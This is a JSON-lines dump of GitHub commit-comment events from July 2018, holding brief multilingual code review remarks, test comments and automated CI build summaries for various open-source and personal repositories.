{"id":"7988036680","type":"CommitCommentEvent","actor":{"login":"markheramis"},"repo":{"name":"ObeeWanKenobee/EasyDB"},"payload":{"comment":{"id":29761840,"position":3,"line":3,"path":"example/basic/2.tables/config.php","commit_id":"e3f16cdb4136c8c624be3faa1d908507b4c23809","created_at":"2018-07-19T09:42:19Z","updated_at":"2018-07-19T09:42:19Z","author_association":"NONE","body":"eto oh, ganito lang, mag one liner lang ba."}},"created_at":"2018-07-19T09:42:19Z"}
{"id":"7988041543","type":"CommitCommentEvent","actor":{"login":"federerke"},"repo":{"name":"federerke/SummerRiver"},"payload":{"comment":{"id":29761849,"position":null,"line":null,"path":null,"commit_id":"afc5ed83bdf2e4111ae9eaa859372f6dd69fabf6","created_at":"2018-07-19T09:43:15Z","updated_at":"2018-07-19T09:43:15Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-19T09:43:15Z"}
{"id":"7988043571","type":"CommitCommentEvent","actor":{"login":"Verten"},"repo":{"name":"umijs/umi-dva-user-dashboard"},"payload":{"comment":{"id":29761853,"position":21,"line":69,"path":"src/pages/users/components/Users.js","commit_id":"f81d36c639d35e67db8b2d0a65b561e4af203eb1","created_at":"2018-07-19T09:43:38Z","updated_at":"2018-07-19T09:43:38Z","author_association":"NONE","body":"是的"}},"created_at":"2018-07-19T09:43:38Z"}
{"id":"7988044896","type":"CommitCommentEvent","actor":{"login":"egeldenhuys"},"repo":{"name":"TripleParity/docks-ui"},"payload":{"comment":{"id":29761856,"position":17,"line":16,"path":"src/app/services/stack/stack.service.ts","commit_id":"48cdd57d6068512dac4d5e5b9115e8aa4f775bf1","created_at":"2018-07-19T09:43:52Z","updated_at":"2018-07-19T09:43:52Z","author_association":"MEMBER","body":"```\r\n// Define the string\r\nvar string = 'Hello World!';\r\n\r\n// Encode the String\r\nvar encodedString = btoa(string);\r\nconsole.log(encodedString); // Outputs: \"SGVsbG8gV29ybGQh\"\r\n\r\n// Decode the String\r\nvar decodedString = atob(encodedString);\r\nconsole.log(decodedString); // Outputs: \"Hello World!\"\r\n```\r\nhttps://scotch.io/tutorials/how-to-encode-and-decode-strings-with-base64-in-javascript"}},"created_at":"2018-07-19T09:43:52Z"}
{"id":"7988048916","type":"CommitCommentEvent","actor":{"login":"rhuss"},"repo":{"name":"rohanKanojia/fabric8-maven-plugin-rt"},"payload":{"comment":{"id":29761865,"position":7,"line":64,"path":"src/main/resources/scripts/prepare-test-environment.sh","commit_id":"bc25d38b5117a25a2584dc21cb0dfc73d584058e","created_at":"2018-07-19T09:44:37Z","updated_at":"2018-07-19T09:44:37Z","author_association":"NONE","body":"Here we could add \r\n\r\n```\r\ngit checkout $COMMIT_ID \r\n```\r\n\r\nwhere $COMMIT_ID would have been read from a top-level file in this repo and which has been updated by a master build in fabric8-maven-plugin."}},"created_at":"2018-07-19T09:44:37Z"}
{"id":"7988052403","type":"CommitCommentEvent","actor":{"login":"k-gavrilov"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29761874,"position":39,"line":39,"path":"lesson1/quadratic_equation.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-19T09:45:15Z","updated_at":"2018-07-19T09:45:15Z","author_association":"OWNER","body":"@mr-koww \r\nДа, верно. Тогда уже нужно думать, какое событие вероятнее. Думаю, это перебор для такой задачи. Этот код уже убрал в последней версии"}},"created_at":"2018-07-19T09:45:15Z"}
{"id":"7988058717","type":"CommitCommentEvent","actor":{"login":"zentol"},"repo":{"name":"apache/flink"},"payload":{"comment":{"id":29761887,"position":16,"line":744,"path":"flink-core/src/main/java/org/apache/flink/configuration/Configuration.java","commit_id":"ec28f92ffd042308494d9661a38ab462738611aa","created_at":"2018-07-19T09:46:27Z","updated_at":"2018-07-19T09:46:27Z","author_association":"CONTRIBUTOR","body":"An option may be for the current and deprecated key(s) at the same time."}},"created_at":"2018-07-19T09:46:27Z"}
{"id":"7988058812","type":"CommitCommentEvent","actor":{"login":"SheikHussain"},"repo":{"name":"SheikHussain/practice"},"payload":{"comment":{"id":29761888,"position":null,"line":null,"path":null,"commit_id":"8022bf59f222547315fc9e2891e64d15f8def125","created_at":"2018-07-19T09:46:28Z","updated_at":"2018-07-19T09:46:28Z","author_association":"OWNER","body":"First commit in Git hub"}},"created_at":"2018-07-19T09:46:28Z"}
{"id":"7988059631","type":"CommitCommentEvent","actor":{"login":"SheikHussain"},"repo":{"name":"SheikHussain/practice"},"payload":{"comment":{"id":29761890,"position":null,"line":null,"path":null,"commit_id":"8022bf59f222547315fc9e2891e64d15f8def125","created_at":"2018-07-19T09:46:37Z","updated_at":"2018-07-19T09:46:37Z","author_association":"OWNER","body":"First commit"}},"created_at":"2018-07-19T09:46:37Z"}
{"id":"7988060604","type":"CommitCommentEvent","actor":{"login":"Ostrenkiy"},"repo":{"name":"StepicOrg/stepik-ios"},"payload":{"comment":{"id":29761891,"position":null,"line":null,"path":null,"commit_id":"f1aad93dbaaa574b7d9669c187ae281c8c539cfa","created_at":"2018-07-19T09:46:49Z","updated_at":"2018-07-19T09:46:49Z","author_association":"MEMBER","body":"Очень годные экстеншны, в основной проект потом перетянем"}},"created_at":"2018-07-19T09:46:49Z"}
{"id":"7988064327","type":"CommitCommentEvent","actor":{"login":"v-bir"},"repo":{"name":"ViennaAPBC/APBC2018"},"payload":{"comment":{"id":29761920,"position":null,"line":null,"path":null,"commit_id":"014d76993900a617140bdf52712eda06ff19c487","created_at":"2018-07-19T09:47:30Z","updated_at":"2018-07-19T09:47:30Z","author_association":"NONE","body":"I do not understand why Travis is not checking my submissions."}},"created_at":"2018-07-19T09:47:30Z"}
{"id":"7988067165","type":"CommitCommentEvent","actor":{"login":"MaximKotliar"},"repo":{"name":"DarrenKong/Bartinter"},"payload":{"comment":{"id":29761926,"position":null,"line":null,"path":null,"commit_id":"22cca673f88d6c674eac8b7a6020892693395151","created_at":"2018-07-19T09:48:03Z","updated_at":"2018-07-19T09:48:03Z","author_association":"NONE","body":"Hey, have you test Bartinter on iOS 8?"}},"created_at":"2018-07-19T09:48:03Z"}
{"id":"7988069804","type":"CommitCommentEvent","actor":{"login":"markheramis"},"repo":{"name":"markheramis/EasyDB"},"payload":{"comment":{"id":29761927,"position":28,"line":304,"path":"class-EasyDB.php","commit_id":"7318e0660e07f0758fc1aec0990dd1c400f96107","created_at":"2018-07-19T09:48:32Z","updated_at":"2018-07-19T09:48:32Z","author_association":"OWNER","body":"This shouldn't be dumped btw, or I don't think we need to catch the exception here. Let the main program catch the exception."}},"created_at":"2018-07-19T09:48:32Z"}
{"id":"7988071951","type":"CommitCommentEvent","actor":{"login":"sajclarke"},"repo":{"name":"PolymathNetwork/polymath-developer-portal"},"payload":{"comment":{"id":29761932,"position":null,"line":null,"path":null,"commit_id":"1acbf13b20cfda661f4eef969e52e1beb9e3dc32","created_at":"2018-07-19T09:48:57Z","updated_at":"2018-07-19T09:48:57Z","author_association":"COLLABORATOR","body":"Please use more descriptive commit messages to explain changes made. Please also be wary of spelling mistakes and use of non-English nomenclature (e.g. 'nterface' and '_investor')"}},"created_at":"2018-07-19T09:48:57Z"}
{"id":"7988072151","type":"CommitCommentEvent","actor":{"login":"ruuda"},"repo":{"name":"travis-ci/travis-conditions"},"payload":{"comment":{"id":29761934,"position":13,"line":20,"path":"README.md","commit_id":"cc54d095d5d11e5c02e47e86323ca8f6ec103c1c","created_at":"2018-07-19T09:48:59Z","updated_at":"2018-07-19T09:48:59Z","author_association":"NONE","body":"This link is dead."}},"created_at":"2018-07-19T09:48:59Z"}
{"id":"7988083135","type":"CommitCommentEvent","actor":{"login":"cthoyt"},"repo":{"name":"bio2bel/entrez"},"payload":{"comment":{"id":29761953,"position":5,"line":99,"path":"src/bio2bel_entrez/manager.py","commit_id":"0461c09aae3fe2b8224b907a38d4aff8ac309a8e","created_at":"2018-07-19T09:51:02Z","updated_at":"2018-07-19T09:51:02Z","author_association":"MEMBER","body":"should be get_genes_by_name since it may return multiple (especially since this depends on case-sensitivity of the database)"}},"created_at":"2018-07-19T09:51:02Z"}
{"id":"7988087178","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29761970,"position":66,"line":60,"path":"Page/index.html","commit_id":"b64f526eba23e8ba82115f7dca1a0c03903eb7b6","created_at":"2018-07-19T09:51:47Z","updated_at":"2018-07-19T09:51:47Z","author_association":"NONE","body":"если элемент `advantages-list__item` то его модификатор `advantages-list__item--..`\r\n\r\nи тут кстати тоже можно сделать `advantages-list__item` отдельным блоком\r\n`advantage` и уже на него вешать модификаторы\r\n\r\nтогда модификаторы будут `advantage--..`\r\n\r\n"}},"created_at":"2018-07-19T09:51:47Z"}
{"id":"7988093000","type":"CommitCommentEvent","actor":{"login":"dapi"},"repo":{"name":"travaler/genesis-js"},"payload":{"comment":{"id":29762015,"position":12,"line":12,"path":"src/CurrentLocationWeather.js","commit_id":"9e9dada923ac50c95f0c9db06d920a4bf5091cac","created_at":"2018-07-19T09:52:50Z","updated_at":"2018-07-19T09:52:50Z","author_association":"NONE","body":"Можно было не вводить переменную и делать return из каждой ветки условия"}},"created_at":"2018-07-19T09:52:50Z"}
{"id":"7988093507","type":"CommitCommentEvent","actor":{"login":"olohvinenko"},"repo":{"name":"smartdevicelink/sdl_hmi"},"payload":{"comment":{"id":29762019,"position":145,"line":474,"path":"ffw/RCRPC.js","commit_id":"62bf1f8ae58134ba82c1245e8236bc4d5587affd","created_at":"2018-07-19T09:52:56Z","updated_at":"2018-07-19T09:52:56Z","author_association":"NONE","body":"@ValeriiMalkov, you have various spacing policies, please use the same everywhere: `data.anyProperty != null`"}},"created_at":"2018-07-19T09:52:56Z"}
{"id":"7988097323","type":"CommitCommentEvent","actor":{"login":"leninmedeiros"},"repo":{"name":"leninmedeiros/modelmutualsupport"},"payload":{"comment":{"id":29762029,"position":null,"line":null,"path":null,"commit_id":"1bb1919a58e613fc45aff86c4ff7c37b0c34c447","created_at":"2018-07-19T09:53:38Z","updated_at":"2018-07-19T09:53:38Z","author_association":"OWNER","body":"Here I just initialised the empty files."}},"created_at":"2018-07-19T09:53:38Z"}
{"id":"7988099190","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762032,"position":134,"line":116,"path":"Page/index.html","commit_id":"b64f526eba23e8ba82115f7dca1a0c03903eb7b6","created_at":"2018-07-19T09:53:59Z","updated_at":"2018-07-19T09:53:59Z","author_association":"NONE","body":"Можно упростить)\r\n\r\n`contact__header-title` -> `contact__title`\r\n`contact__header-text` -> `contact__text`"}},"created_at":"2018-07-19T09:53:59Z"}
{"id":"7988102499","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29762042,"position":27,"line":45,"path":"mod/book/db/upgrade.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-19T09:54:36Z","updated_at":"2018-07-19T09:54:36Z","author_association":"MEMBER","body":"It's a Moodle core convention to help developers identify where to add upgrades, I'd imagine this will get raised by review. I'm not sure this is likely to get backported to older versions as it's a functional change, so it may be worth targeting 3.6?"}},"created_at":"2018-07-19T09:54:36Z"}
{"id":"7988104824","type":"CommitCommentEvent","actor":{"login":"Herostwist"},"repo":{"name":"mrmoses/gmaps-api-net"},"payload":{"comment":{"id":29762054,"position":null,"line":null,"path":null,"commit_id":"de933d1465f86fcb72fa1292129a715199131d30","created_at":"2018-07-19T09:55:03Z","updated_at":"2018-07-19T09:55:03Z","author_association":"NONE","body":"Just a note. If you are using place_id, you cannot use other parameters like bounds. They should not be appended when using place_id. "}},"created_at":"2018-07-19T09:55:03Z"}
{"id":"7988107695","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29762056,"position":1,"line":1,"path":"Lesson5HW/spring-shell.log","commit_id":"90a399cd321cffdabadd9f3f751d9492049e848c","created_at":"2018-07-19T09:55:34Z","updated_at":"2018-07-19T09:55:34Z","author_association":"NONE","body":"Лог ставьте в .gitignor, ему нечего делать в репозитории"}},"created_at":"2018-07-19T09:55:34Z"}
{"id":"7988109375","type":"CommitCommentEvent","actor":{"login":"emalgorithm"},"repo":{"name":"chengli-um/DeepCas"},"payload":{"comment":{"id":29762059,"position":1,"line":1,"path":"data/test-net/cascade_train.txt","commit_id":"8b5228c8c2cfd464f28ae8ab46a6bd9a02870fbb","created_at":"2018-07-19T09:55:53Z","updated_at":"2018-07-19T09:55:53Z","author_association":"NONE","body":"Hi, I was reading your paper and trying to replicate your results. I noticed that in table 1 you state that you used around 25000 cascades for training. However, this file contains only 387 cascades. I was wondering what was the difference due to. Thanks."}},"created_at":"2018-07-19T09:55:53Z"}
{"id":"7988117062","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762070,"position":158,"line":135,"path":"Page/index.html","commit_id":"b64f526eba23e8ba82115f7dca1a0c03903eb7b6","created_at":"2018-07-19T09:57:17Z","updated_at":"2018-07-19T09:57:17Z","author_association":"NONE","body":"тут модификатор тоже не совсем такой\r\nзапутался так  как длинные названия)\r\nэто можно решить так:\r\n\r\nдавай социальные кнопки все сделаем отдельным блоком\r\nто есть к `page-footer-social__list` добавим дополнительный класс `social`\r\n\r\nтогда `page-footer-social__item` -> `social__item`\r\nа модификаторы будут `social__item--..`"}},"created_at":"2018-07-19T09:57:17Z"}
{"id":"7988118450","type":"CommitCommentEvent","actor":{"login":"ronvente"},"repo":{"name":"ronvente/Vaatwasser-uitruimen"},"payload":{"comment":{"id":29762073,"position":null,"line":null,"path":null,"commit_id":"95ed44b9db75e6a8295e65ec9197e56b100ef66d","created_at":"2018-07-19T09:57:34Z","updated_at":"2018-07-19T09:57:34Z","author_association":"OWNER","body":"Een vaatwasser natuurlijk!"}},"created_at":"2018-07-19T09:57:34Z"}
{"id":"7988119784","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29762076,"position":55,"line":55,"path":"Lesson5HW/src/main/java/ru/otus/lesson5hw/service/Test.java","commit_id":"90a399cd321cffdabadd9f3f751d9492049e848c","created_at":"2018-07-19T09:57:50Z","updated_at":"2018-07-19T09:57:50Z","author_association":"NONE","body":"Когда нет параметров, напомню, что сюда можно передавать null - сэкономите создание массива."}},"created_at":"2018-07-19T09:57:50Z"}
{"id":"7988127182","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762084,"position":2,"line":2,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T09:59:10Z","updated_at":"2018-07-19T09:59:10Z","author_association":"NONE","body":"lang=\"ru\" :)"}},"created_at":"2018-07-19T09:59:10Z"}
{"id":"7988129338","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"zhuravlevmaxim/OTUS_SpringFramework"},"payload":{"comment":{"id":29762088,"position":87,"line":87,"path":"Lesson5HW/src/main/java/ru/otus/lesson5hw/service/Test.java","commit_id":"90a399cd321cffdabadd9f3f751d9492049e848c","created_at":"2018-07-19T09:59:34Z","updated_at":"2018-07-19T09:59:34Z","author_association":"NONE","body":"Вот лучше создавать черезLocal.forLanguageTag()\r\nДа. и лучше не пистаь локаль en. Есть по идее en_US."}},"created_at":"2018-07-19T09:59:34Z"}
{"id":"7988130081","type":"CommitCommentEvent","actor":{"login":"Ashu-Tiwari"},"repo":{"name":"Ashu-Tiwari/demo"},"payload":{"comment":{"id":29762091,"position":null,"line":null,"path":null,"commit_id":"c39f6fcb5323b78149931ccb128e3d043f0cb3ba","created_at":"2018-07-19T09:59:43Z","updated_at":"2018-07-19T09:59:43Z","author_association":"OWNER","body":"trying"}},"created_at":"2018-07-19T09:59:43Z"}
{"id":"7988130908","type":"CommitCommentEvent","actor":{"login":"KatyaMatya21"},"repo":{"name":"kymmyD123/Cat-Energy"},"payload":{"comment":{"id":29762093,"position":6,"line":6,"path":"source/catalog.html","commit_id":"a1222001ee755421f1dc6974f8a1a2d9e1139f5b","created_at":"2018-07-19T09:59:51Z","updated_at":"2018-07-19T09:59:51Z","author_association":"NONE","body":"<link rel=\"stylesheet/less\" href=\"css/style.less\"> можно убрать - сделаем нормальную сборку и будет всё работать без него)\r\n"}},"created_at":"2018-07-19T09:59:51Z"}
{"id":"7992227419","type":"CommitCommentEvent","actor":{"login":"prasadkasturi"},"repo":{"name":"navitastech-rfad/rfad-ui"},"payload":{"comment":{"id":29772318,"position":null,"line":null,"path":null,"commit_id":"d40ab689e52b9ab52e749ec0f0deb7da54b0d483","created_at":"2018-07-20T00:00:14Z","updated_at":"2018-07-20T00:00:14Z","author_association":"NONE","body":"test test test"}},"created_at":"2018-07-20T00:00:14Z"}
{"id":"7992227941","type":"CommitCommentEvent","actor":{"login":"NetroScript"},"repo":{"name":"NetroScript/node-steamcommunity"},"payload":{"comment":{"id":29772326,"position":null,"line":null,"path":null,"commit_id":"9b1d40ce7f1733836fe69f2a65cda776db7cb247","created_at":"2018-07-20T00:00:24Z","updated_at":"2018-07-20T00:00:24Z","author_association":"OWNER","body":"this commit closes #181 "}},"created_at":"2018-07-20T00:00:24Z"}
{"id":"7992228208","type":"CommitCommentEvent","actor":{"login":"DirtyF"},"repo":{"name":"regisphilibert/rp_hugo"},"payload":{"comment":{"id":29772328,"position":27,"line":27,"path":"content/post/hugo-pipes/index.md","commit_id":"b035564d253ce058b4de76cd716399c37022cc0c","created_at":"2018-07-20T00:00:29Z","updated_at":"2018-07-20T00:00:29Z","author_association":"COLLABORATOR","body":"I'd simply call them `security alerts`, they're not related to Git or GitHub. latest `npm` version warns you about security flaws in node packages for instance."}},"created_at":"2018-07-20T00:00:29Z"}
{"id":"7992228601","type":"CommitCommentEvent","actor":{"login":"gabizou"},"repo":{"name":"SpongePowered/SpongeCommon"},"payload":{"comment":{"id":29772332,"position":22,"line":51,"path":"src/main/java/org/spongepowered/common/mixin/core/entity/MixinEntityAgeable.java","commit_id":"23759160161d3b5528fdee1a1e6340b25937d995","created_at":"2018-07-20T00:00:37Z","updated_at":"2018-07-20T00:00:37Z","author_association":"MEMBER","body":"Maybe do a PhaseState?"}},"created_at":"2018-07-20T00:00:37Z"}
{"id":"7992231270","type":"CommitCommentEvent","actor":{"login":"nchillara"},"repo":{"name":"nchillara/MyTest"},"payload":{"comment":{"id":29772339,"position":null,"line":null,"path":null,"commit_id":"a26aebe5a2473e6e2592dd9175a11128af79e598","created_at":"2018-07-20T00:01:34Z","updated_at":"2018-07-20T00:01:34Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-20T00:01:34Z"}
{"id":"7992231863","type":"CommitCommentEvent","actor":{"login":"jugglinmike"},"repo":{"name":"bocoup/wpt"},"payload":{"comment":{"id":29772342,"position":null,"line":null,"path":null,"commit_id":"553c1be50213729d5e573ab2db3e6c12e4c2272b","created_at":"2018-07-20T00:01:47Z","updated_at":"2018-07-20T00:01:47Z","author_association":"MEMBER","body":"Aw, thanks @Hexcles :)\r\n\r\nAlso: spotting a commit to a fork of WPT? Good eye!"}},"created_at":"2018-07-20T00:01:47Z"}
{"id":"7992237244","type":"CommitCommentEvent","actor":{"login":"nchillara"},"repo":{"name":"nchillara/MyTest"},"payload":{"comment":{"id":29772352,"position":null,"line":null,"path":null,"commit_id":"a26aebe5a2473e6e2592dd9175a11128af79e598","created_at":"2018-07-20T00:03:35Z","updated_at":"2018-07-20T00:03:35Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-20T00:03:35Z"}
{"id":"7992239650","type":"CommitCommentEvent","actor":{"login":"nchillara"},"repo":{"name":"nchillara/MyTest"},"payload":{"comment":{"id":29772359,"position":null,"line":null,"path":null,"commit_id":"a26aebe5a2473e6e2592dd9175a11128af79e598","created_at":"2018-07-20T00:04:29Z","updated_at":"2018-07-20T00:04:29Z","author_association":"OWNER","body":"new updates"}},"created_at":"2018-07-20T00:04:29Z"}
{"id":"7992239964","type":"CommitCommentEvent","actor":{"login":"DirtyF"},"repo":{"name":"regisphilibert/rp_hugo"},"payload":{"comment":{"id":29772361,"position":107,"line":107,"path":"content/post/hugo-pipes/index.md","commit_id":"b035564d253ce058b4de76cd716399c37022cc0c","created_at":"2018-07-20T00:04:36Z","updated_at":"2018-07-20T00:04:36Z","author_association":"COLLABORATOR","body":"From what I understand, you can use global packages, so this will not necessarily add `node_modules` in your project. "}},"created_at":"2018-07-20T00:04:36Z"}
{"id":"7992247890","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29772376,"position":null,"line":null,"path":null,"commit_id":"7efbbbadded822165859e4a09c4d92d2d404f37d","created_at":"2018-07-20T00:07:41Z","updated_at":"2018-07-20T00:07:41Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-20T00:07:41Z"}
{"id":"7992251756","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29772387,"position":null,"line":null,"path":null,"commit_id":"7efbbbadded822165859e4a09c4d92d2d404f37d","created_at":"2018-07-20T00:09:09Z","updated_at":"2018-07-20T00:09:09Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7efbbbadded822165859e4a09c4d92d2d404f37d-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T00:09:09Z"}
{"id":"7992253788","type":"CommitCommentEvent","actor":{"login":"Elendan"},"repo":{"name":"NosCoreIO/NosCore"},"payload":{"comment":{"id":29772391,"position":9,"line":9,"path":"src/NosCore.Shared/Enumerations/FinsPacketType.cs","commit_id":"54ec101d1076c236cb4f8dd2e706fa3586109700","created_at":"2018-07-20T00:09:57Z","updated_at":"2018-07-20T00:09:57Z","author_association":"COLLABORATOR","body":"No, it needs to start with 1, otherwise it starts with 0 & the packet is wrong"}},"created_at":"2018-07-20T00:09:57Z"}
{"id":"7992261450","type":"CommitCommentEvent","actor":{"login":"danielstuart14"},"repo":{"name":"Magisk-Modules-Repo/Xiaomi-Mi-A1-Stock-Camera"},"payload":{"comment":{"id":29772405,"position":null,"line":null,"path":null,"commit_id":"a638ea6ad1ab546d6dc87f2c5e9a802a5d522ef3","created_at":"2018-07-20T00:12:57Z","updated_at":"2018-07-20T00:12:57Z","author_association":"CONTRIBUTOR","body":"hey @joeyhuab , can you send me an email? It's daniel.stuart14@gmail.com\r\nI can take a look! I was trying to figure out why we can't mute the camera shutter sound, but I didn't had the time for it."}},"created_at":"2018-07-20T00:12:57Z"}
{"id":"7992263111","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29772407,"position":null,"line":null,"path":null,"commit_id":"996c6aa7aaf3d74b1dcc8705fba000992b4d6f81","created_at":"2018-07-20T00:13:30Z","updated_at":"2018-07-20T00:13:30Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/996c6aa7aaf3d74b1dcc8705fba000992b4d6f81)\n\nBuilt at __20180720 - 00:13:30__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/rpm.txt) | no test results, t: n/a | FAIL :red_circle: \nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 566s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/coverage.txt) | 1035 cases, 0 failed, t: 692s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 810s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 254s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 499s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 588s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 255s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1239s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 343s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 649s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 363s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 516s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/18//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 251s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-20T00:13:30Z"}
{"id":"7992265798","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29772416,"position":null,"line":null,"path":null,"commit_id":"ab8f96d5fba0db5c8175688f1d95f3af661f0024","created_at":"2018-07-20T00:14:27Z","updated_at":"2018-07-20T00:14:27Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-835](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-835).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-835-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T00:14:27Z"}
{"id":"7992274723","type":"CommitCommentEvent","actor":{"login":"rskarras"},"repo":{"name":"rskarras/react-draggable"},"payload":{"comment":{"id":29772458,"position":null,"line":null,"path":null,"commit_id":"7c8fc96338c12042a853c5e20d1feba5904922e5","created_at":"2018-07-20T00:17:55Z","updated_at":"2018-07-20T00:17:55Z","author_association":"OWNER","body":"DraggableCore\r\n\r\nThis addresses a breaking change with newer versions of Chrome (Chrome 56 and newer) which ignores preventDefault in passive event listeners. There is documentation on this change at\r\n\r\nhttps://developers.google.com/web/updates/2017/01/scrolling-intervention\r\n\r\nThis addresses issue #227 by disabling scrolling at the beginning of a drag action.\r\n------------------\r\nDisables touch scrolling during drag events on Safari. \r\nThis addresses issue #279."}},"created_at":"2018-07-20T00:17:55Z"}
